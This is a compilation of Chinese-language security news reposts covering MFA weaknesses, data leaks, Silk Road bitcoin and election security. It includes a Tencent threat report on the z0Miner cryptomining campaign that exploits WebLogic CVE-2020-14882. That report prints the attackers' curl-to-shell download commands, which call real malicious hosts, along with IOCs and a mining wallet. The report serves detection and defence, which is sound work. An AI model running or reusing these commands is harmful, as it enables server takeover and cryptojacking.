身为微软身份安全总监的Alex Weinert写了一篇博客文章，强调了摆脱基于公共交换电话网络（PSTN）的多因素认证（MFA）机制的必要性。这位高管强调了基于PSTN的MFA系统存在安全隐患的各种理由，如短信和语音验证码，他强调，MFA本身是必不可少的，只是人们使用它的方式应该改变。 Weinert表示，基于PSTN的机制是目前最不安全的MFA方法，因为实际上所有的利用技术，如网络钓鱼和账户接管等仍然可以借此进行。一旦攻击者将兴趣转移到破解MFA系统上，这种情况只会变得更糟，而这取决于公众使用MFA系统的程度。此外，PSTN消息也不能适应不同类型的用户，所以通过它们进一步提高安全性的潜力是有限的。 例如，攻击者可以在大多数网络上部署软件来拦截基于PSTN的消息，意味着这又是一个独特的攻击面，对于恶意行为者来说是有利用价值的。 值得注意的是，大多数PSTN系统都有在线账户和丰富的客户支持基础设施支持。可悲的是，客户支持代理很容易受到魅惑、胁迫、贿赂或敲诈。如果这些社会工程学攻击成功，客户支持可以提供对SMS或语音通道的访问。虽然社会工程攻击也会影响电子邮件系统，但主要的电子邮件系统（如Outlook、Gmail）拥有更发达的 “肌肉”，可以通过其支持生态系统防止账户泄露。这就导致了从信息拦截、呼叫转发攻击到SIM卡劫持等一切问题。 不幸的是，PSTN系统并不是100%可靠，报告也不是100%一致。这取决于地区和运营商，但消息到最终接收人那里的路径可能会影响它需要多长时间才能得到，以及是否完全得到它。在某些情况下，运营商会在投递失败时报告投递情况，而在另一些情况下，消息的投递可能需要足够长的时间，以至于用户认为消息已经无法通过。在一些地区，投递率甚至低至50%。MFA提供商没有实时信号反馈来提示问题的出现，只能依靠统计完成率或服务台电话来发现问题，这意味着向用户提供替代方案或警告问题的信号难以提供。 不仅如此，监管方面，有关短信和通话的规定变化很快，而且各地区的规定也不尽相同，当使用基于PSTN的MFA系统时，可能会导致中断。     （消息来源：cnBeta；封面来自网络）

Gitpaste-12是Juniper Threat Labs最近发现的一种新蠕虫，它使用GitHub和Pastebin来存储组件代码，并且至少提供12种不同的攻击模块。 目前，该恶意软件正在开发中，它的目标是基于Linux的x86服务器，以及基于Linux ARM和MIPS的物联网设备。   更多内容请至Seebug Paper  阅读全文：https://paper.seebug.org/1394/     消息来源：JUNIPER，封面来自网络，译者：芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

本次黑客竞赛展示了对多个平台的攻击，包括: 1.Adobe PDF Reader 2.Apple iPhone 11 Pro running iOS 14 and Safari browser 3.ASUS RT-AX86U router 4.CentOS 8 5.Docker Community Edition 6.Google Chrome 7.Microsoft Windows 10 v2004 8.Mozilla Firefox 9.Samsung Galaxy S20 running Android 10 10.TP-Link TL-WDR7660 router 11.VMware ESXi hypervisor 在上周末举行的为期两天的活动中，来自15个不同团队的白帽黑客三次尝试，利用最初的漏洞，在5分钟内侵入了广泛使用的软件和移动设备。 简而言之，这个想法就是使用各种网络浏览器来导航到一个远程URL，或者利用软件中的一个漏洞来控制浏览器或底层操作系统。     消息来源：The Hacker News ；封面来自网络；译者：芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

Office 2010这一标志性的微软办公套件的经典版本从10月起不再受到官方支持，但第三方补丁服务团队0patch表示，它将通过其微补丁帮助用户防范漏洞，继续为Office 2010延长寿命。虽然微补丁一般只会提供给拥有专业或企业订阅的0patch付费客户，但该公司表示，”我们可能偶尔会决定向0patch免费用户提供一些这些微补丁，例如有望帮助减缓全球蠕虫的爆发的时候”。 然而，如果需要保证补丁安装后持续有效，需要确保原来就安装了最新版本的Office 2010以及所有可用的官方更新. 还记得0patch是如何让人们”安全地采用”Windows 7和Server 2008 R2的吗？ 当他们在2020年1月达到支持结束的时候，0patch就已经针对这些系统中的21个高危漏洞发布了微补丁，其中最受欢迎的无疑是针对Zerologon（CVE-2020-1472）的微补丁，这个漏洞几乎影响了所有Windows，目前正被勒索软件团伙广泛利用。 由于Office 2010在上个月已经达到了支持的终点，而且许多组织表示有兴趣保持它的安全，0patch决定也开始设法让人们”安全采用”Office 2010，截止发稿，这项服务已经普遍可用。 这个服务是如何运作的呢？与0patch为 Windows 7 和 Windows Server 2008 R2 所做的工作类似，安全研究人员从各种来源收集 Office 2010 的漏洞信息：合作伙伴、安全社区、公共来源，以及通过测试新发现的影响仍受支持的 Office 版本的漏洞是否也会影响 Office 2010。当安全人员在评估中发现一个高风险的漏洞，并且有足够的数据来重现它时，就会为它创建一个微修补程序，这些程序在完全更新后的Office 2010上运行。就像Windows 7和Server 2008 R2一样。     （消息及封面来源：cnBeta）

据外媒报道，西班牙巴塞罗那一家名为Prestige Software的软件公司被发现暴露了全球数百万客户的敏感、隐私和财务数据。尤其是来自Booking.com、Expedia、Agoda、Amadeus、Hotels.com、Hotelbeds、Omnibees、Sabre等几家公司的客户都是此次数据泄露事件的意外受害者。 暴露的数据库最初是由Website Planet的研究人员发现，Prestige Software拥有的一个配置错误的AWS S3 bucket在没有任何安全认证的情况下被开放给公众访问。研究人员分析了该数据库，并得出结论称，它包含了价值24.4GB的数据，总计超过1000万个文件。 值得一提的是，Prestige Software为酒店提供了一个名为Cloud Hospitality的渠道管理平台，用于处理顶级预订网站上的房间供应并实现自动化。在此案中，该软件公司在没有任何安全措施的情况下，存储了旅行社和酒店客户的信用卡数据。结果，客户的个人和财务数据早在2013年就被暴露在网上。 根据Website Planet研究人员Mark Holden编制的报告，被曝光的数据属于酒店客人，包含以下内容： 全名 NIC号码 电子邮件地址 电话号码 酒店预订号 逗留日期和期限 信用卡号码，包括卡主姓名、CVV代码和卡的到期日。 我们没有审查S3 bucket中暴露的所有文件，所以这不是一个完整的列表。每一个连接到云酒店的网站和预订平台可能都受到了影响。这些网站不对因此而暴露的任何数据负责，Holden在报告中表示。 由于Prestige软件公司总部位于欧洲，而暴露的数据属于全球各地的人，包括欧洲公民的公民；该公司应该准备好接受GDPR的巨额罚款和处罚。 至于受影响的客户，目前还不清楚你的数据是否被第三方恶意访问。然而，正如最近所见，网络犯罪分子一直在扫描暴露的数据库，窃取数据并在暗网市场上出售，或在黑客论坛上泄露数据供免费下载。 几个月前曾报道过这样一起案件，4200万伊朗人的个人资料和电话号码被暴露在配置错误的服务器上，并在几天内最终在暗网和黑客论坛上出售。 在另一个案例中，Hackread.com报道称，2019年12月，一个配置错误的数据库暴露了2.67亿Facebook用户的个人信息。2020年4月，同样的数据库在一个黑客论坛上以600美元的价格出售。       （消息来源：cnBeta；封面来自于网络）

雅虎邮箱的受欢迎程度在过去几年里大幅下降，而该服务所卷入的黑客丑闻无疑对其崩溃起到了关键作用。然而，仍然有人在使用雅虎邮箱，而从目前来看，母公司Verizon由于一个奇怪的决定，将让更多的用户离开。这一次，雅虎邮箱将不再允许拥有免费账户的用户将邮件转发到另一个账户。 该公司解释说，只有付费客户才会被提供这样的功能。换句话说，如果你在雅虎邮箱中收到一封邮件，除非你是付费客户，否则你将无法将其转发给其他人。Verizon本周宣布，这一变化将于明年1月1日生效。 如果你的免费雅虎邮箱账户被设置为自动转发邮件到第三方收件箱（如Gmail），那么这些邮件将在2021年1月1日停止传递到第三方地址。你仍然可以通过网页浏览器mail.yahoo.com或通过雅虎邮箱应用查看雅虎邮箱中的邮件。雅虎邮箱专业版用户不会受到这一变化的影响。 不难理解Verizon为何做出这一决定。在雅虎邮箱人气明显下降的情况下，一些只想保留雅虎收件箱的用户将自动转发规则配置到了其他账户上，因此所有到达雅虎邮箱的邮件都会自动转发到另一个邮箱地址。不过，Verizon表示，它之所以要做这件事，是因为安全原因。 Verizon表示：”我们会根据当前的安全标准定期评估我们的产品和服务，并决定删除这一功能，以帮助确保免费的雅虎邮箱账户保持安全。这一改变将帮助我们专注于为雅虎邮箱用户打造最好的新功能和体验。“虽然没有提供具体的细节，但电子邮件转发规则可以被黑客利用，以获得访问权的敏感信息，这一切都在主人不知情的情况下发送。 如果出于某种原因，你想继续使用雅虎邮箱，但仍想转发邮件，现在有两种选择：购买雅虎邮箱专业版或只购买访问+转发套餐，即注册Access + Forwarding。Access + Forwarding将确保用户当前的转发连接无缝延续。用户还将受益于雅虎邮箱的1TB存储空间，这样用户的邮件和附件文件就不会因为长时间不活动而被清除。另外，用户也可以升级到雅虎邮箱专业版。雅虎邮件专业版将从用户雅虎邮件收件箱中删除广告，并为用户提供优先的客户支持，同时允许用户自动转发邮件到第三方账户。 目前有很多其他的电子邮件服务，提供相同的功能，绝对免费，比如Gmail。现在，雅虎邮件专业版每月收费3.49美元，而访问+转发包可以以12美元的年费购买。在Verizon做出这个意外的决定后，有多少用户会转投订阅服务还有待观察，但目前，如果又有一波用户放弃雅虎邮箱，转投众多替代品，外界也不会感到惊讶。       （消息来源：cnBeta；封面来自网络）

尽管臭名昭著的“思路”（Silk Road）网站幕后运营者 Ross Ulbricht 已于 2015 年 2 月 4 日被判处终身监禁，但其被联邦调查局收缴的大约 17.4 万个比特币的价值仍在不断增长。有报道称，这个黑市吸引了将近 15 万买家和 4000 卖家，总共促成了约 1.83 亿美元的灰色交易。当初 Ross Ulbricht 被收缴的比特币价值约 1.05 亿美元，后被美国政府以拍卖的形式转售。 有传闻称，被收缴拍卖的这部分比特币，仅占 Ross Ulbricht 不法所得的一小部分。如果当初思路平台抽取的佣金多达 61.4 万个比特币，那价值约 60 亿美元的另外 44 万个比特币又在哪里？ 近日，Elliptic 联合创始人兼首席科学家 Tom Robinson 博士，在一篇文章中对加密货币的取证、调查、合规性、以及制裁等方面进行了讨论。 由于 Ulbricht 不大可能将这笔流水全部扣在自己手上（比如为了黑市网络的运营而支出的部分款项），其很可能在某些交易所抛出过自己持有的部分比特币。 快进到今天，有一笔将近 10 亿美元（69369 枚比特币）的交易引发了加密货币社区的强烈关注。 可知本次提取的钱包地址为 1HQ3Go3ggs8pFnXuHVHRytPCq5fGG8Hbhx，余额仍在所有钱包中排名第四。 过去一年来，黑客论坛上一直流传着某个加密文件，据说里面包含了某个加密货币钱包的密钥。如果爆料靠谱，那破解者便可顺利挪动这部分加密货币资金。 通过区块链分析，Elliptic 认为这笔资金很可能来自 Silk Road 。因为 2012 年 5 月 6 号的时候，这笔当时价值约 35 万美元的资金曾从 Silk Road 钱包里流出。 在休眠了将近一年之后，这笔资金又于 2013 年 4 月被转移到了 1HQ3 开头的那串加密钱包地址。时至今日，这个钱包都一直保持着安静，除了在 2015 年向 BTC-e 转去了 101 个比特币。 作为一个经常被洗钱者光顾的加密货币交易平台，BTC-e 已于 2017 年被美国执法机构给取缔。现如今，这些比特币的价值已接近 10 亿美元，其动向或表明有黑市卖家在转移资金。 鉴于 Ulbricht 已经锒铛入狱，这些操作显然不是他亲手为之。但无论哪种方式，都意味着有一双幕后黑手在垂涎这部分资金。     （消息及封面来源：cnBeta）

目前美国部分地区的投票站已经关闭，网络安全官员和专家表示并没有出现任何重大或者破坏性的网络攻击。不过这并不意味着选举日就一帆风顺。在内华达州和得克萨斯州的一些投票机出现了短暂宕机的情况，不过随后很快恢复正常；而佐治亚州和俄亥俄州的选民在洗手液泄漏到机器中后，不得不使用纸质选票进行投票。 负责监督美国选举安全性的国土安全部网络安全和基础设施安全局（CISA）表示，选举日一切顺利，没有发现任何障碍。而本周二晚间和记者的通话中，CISA 一位高管表示 ：“今天和往常互联网的周二没有区别”。但他也承认“我们还没有走出困境[指最终投票结果的报告]”，目前很多州都保持胶着状态。 中情局局长克里斯托弗·克雷布斯（Christopher Krebs）在一份声明中表示，“没有证据显示任何外国对手有能力阻止美国人投票或改变投票记录。”Cloudflare发布的数据表明，选举日政府选举网站上的网络攻击略有上升，但首席执行官Matthew Prince在推特上表示，上升幅度“相对较小”，而攻击则“过分复杂”。       （消息及封面来源：cnBeta）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/cyPZpB4zkSQccViM0292Zg   一、概述 腾讯主机安全（云镜）于2020.11.02日捕获到挖矿木马团伙z0Miner利用Weblogic未授权命令执行漏洞（CVE-2020-14882/14883）的攻击行动。该团伙通过批量扫描云服务器发现具有Weblogic漏洞的机器，发送精心构造的数据包进行攻击。之后执行远程命令下载shell脚本z0.txt运行，再利用该shell脚本植入门罗币挖矿木马、挖矿任务本地持久化，以及通过爆破SSH横向移动。根据该团伙控制的算力推算，已有大约5000台服务器受害。 由于Weblogic未授权命令执行漏洞（CVE-2020-14882/14883）10月21日才被官方公布，有许多企业未来得及修复，同时该漏洞的补丁存在被绕过的风险。因此该挖矿木马可能对云主机造成较大威胁。 腾讯安全建议企业检查服务器上是否存在文件/tmp/javax/ssd2，检查crontab定时任务中是否存在可疑下载命令，删除挖矿木马文件和相关任务，检查Weblogic是否属于受影响版本并及时采取修复措施。 腾讯安全主机安全（云镜）、云防火墙、漏洞扫描系统、腾讯高级威胁检测系统（御界）均于10月28日升级，支持对该漏洞以及随后的补丁绕过风险进行检测和拦截。Oracle也于11月2日发布新安全更新，以解决CVE-2020-14882补丁被绕过的风险，腾讯安全专家建议用户尽快将Weblogic组件升级到最新版本。   腾讯安全系列产品应对z0Miner挖矿木马家族的响应清单如下： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）z0Miner挖矿木马相关IOCs已入库。各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考： https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）z0Miner挖矿木马相关信息和情报已支持检索。网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考： https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）已支持识别检测z0Miner挖矿木马关联的IOCs； 2）已支持检测和拦截Weblogic未授权命令执行漏洞（CVE-2020-14882/14883） 有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀z0Miner相关木马程序； 2）已支持检测Weblogic未授权命令执行漏洞（CVE-2020-14882/14883） 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持检测Weblogic未授权命令执行漏洞（CVE-2020-14882/14883） 关于T-Sec高级威胁检测系统的更多信息，可参考：https://cloud.tencent.com/product/nta 二、详细分析 10月21日，Oracle官方发布数百个组件的高危漏洞公告。其中多个Weblogic组件相关高危漏洞引起业界高度关注。未经授权的攻击者可以绕过WebLogic后台登录等限制，直接远程利用反序列化漏洞，从而接管WebLogic服务器，风险极大。 10月28日，腾讯安全团队关注到互联网上已出现CVE-2020-14882和CVE-2020-14883两个高危漏洞POC（验证代码），未经身份验证的远程攻击者可能通过构造特殊的HTTP GET请求，利用该漏洞在受到攻击的WebLogic Server上执行任意代码。漏洞影响Oracle WebLogic Server的多个版本： 10.3.6.0.0（ZoomEye搜索结果） 12.1.3.0.0（ZoomEye搜索结果） 12.2.1.3.0（ZoomEye搜索结果） 12.2.1.4.0（ZoomEye搜索结果） 14.1.1.0.0（ZoomEye搜索结果）   11月02日腾讯云捕获到挖矿木马z0Miner利用CVE-2020-14882的攻击行为。攻击者精心构造具有CVE-2020-14882漏洞利用代码的数据包后，通过210.108.70.119向目标服务器发送请求。 漏洞攻击成功后在Payload中执行远程代码： curl -fsSL http[:]//218.61.5.109/errors/z0.txt-o /tmp/solrbash /tmp/solr 该代码下载shell脚本z0.txt保存为/tmp/solr并通过bash命令执行。z0.txt首先通过匹配进程和文件名清除竞品挖矿木马。 然后安装crontab定时任务进行持久化，定期下载木马https[:]//pastebin.com/raw/kkMGTEB4以及shell脚本https[:]//pastebin.com/raw/kkMGTEB4到失陷主机上运行，目前该URL返回数据为“exit”，可能在后续攻击中添加恶意代码。 通过SSH远程登陆已经认证过的机器进行横向移动，并在感染后执行远程命令： curl -fsSLhttp[:]//189.7.105.47:8181/examples/jsp/z0.txt | sh 最后下载门罗币挖矿木马javae.exe保存至/tmp/javax/ssd2，通过脚本config.sh启动挖矿。 挖矿木马采用开源挖矿程序XMRig编译，挖矿使用钱包 43vpvnvubbGUMuGffKAbwfeDYHRiDtBKWKUcncVttFMYHJyPV6DbHG7b3oSXSK52Fe3VF27zi9ai2CqCRcUvMmDbNMGWpuY。 由于该木马刚刚上线，目前挖矿获得收益只有0.1个XMR，但根据其算力133 KH/s推算其已控制约5000台服务器进行挖矿。 IOCs IP 222.108.2.20（ZoomEye搜索结果） 218.61.5.109（ZoomEye搜索结果） 189.7.105.47（ZoomEye搜索结果） 210.108.70.119（ZoomEye搜索结果）   Md5 javae.exe 373b018bef17e04d8ff29472390403f9 z0.txt 48072a4ad46bf20ddd6fdc6a19155c78 z0.txt 067a531e8580fe318ebff0b4038fbe6b config.sh 5020b71e9cd1144c57f39c9d4072201b   URL http[:]//222.108.2.20/about/javae.exe http[:]//218.61.5.109/errors/z0.txt http[:]//218.61.5.109/errors/config.sh http[:]//189.7.105.47:8181/examples/jsp/config.json http[:]//189.7.105.47:8181/examples/jsp/config.sh http[:]//189.7.105.47:8181/examples/jsp/z0.txt https[:]//pastebin.com/raw/qKcPmSNp https[:]//pastebin.com/raw/kkMGTEB4   钱包： 43vpvnvubbGUMuGffKAbwfeDYHRiDtBKWKUcncVttFMYHJyPV6DbHG7b3oSXSK52Fe3VF27zi9ai2CqCRcUvMmDbNMGWpuY   参考链接： 1.https://mp.weixin.qq.com/s/LIjO2St8PdvXm3lS5wsJPQ 2.https://mp.weixin.qq.com/s/6qsjUMJaUpUQHZYdsB3Ntw 3.https://blog.rapid7.com/2020/10/29/oracle-weblogic-unauthenticated-complete-takeover-cve-2020-14882-what-you-need-to-know/

当地时间11月3日，瑞典最大的保险公司Folksam在新闻稿中证实，近100万客户的个人信息已泄露给Facebook和Google等社交媒体。Folksam表示歉意，并已要求公司删除该信息。 在一次内部审计中，Folksam发现与数字合作伙伴共享了大约100万人的个人数据，其中一些被认为是敏感的。Folksam已要求合作伙伴公司删除该信息。 “我们知道这会引起客户的关注，我们认真对待发生的事情。我们已立即停止共享个人信息，并要求将其删除。”Folksam营销和销售主管表示，“我们这样做的目的是分析并为客户提供定制的报价，但是不幸的是，我们没有以正确的方式做到这一点。” Folksam分享了可能被视为敏感的个人数据，例如，某人购买了工会保险或怀孕保险，以及特别值得保护的个人数据——个人社会保险号。Folksam已要求已收到个人信息的合作伙伴将其删除。当前，没有信息表明该信息已被第三方以任何不当方式使用。 从Folksam接收个人数据的公司有Facebook，Google，Microsoft，Linkedin和Adobe。     （消息来源：cnBeta；封面来自网络）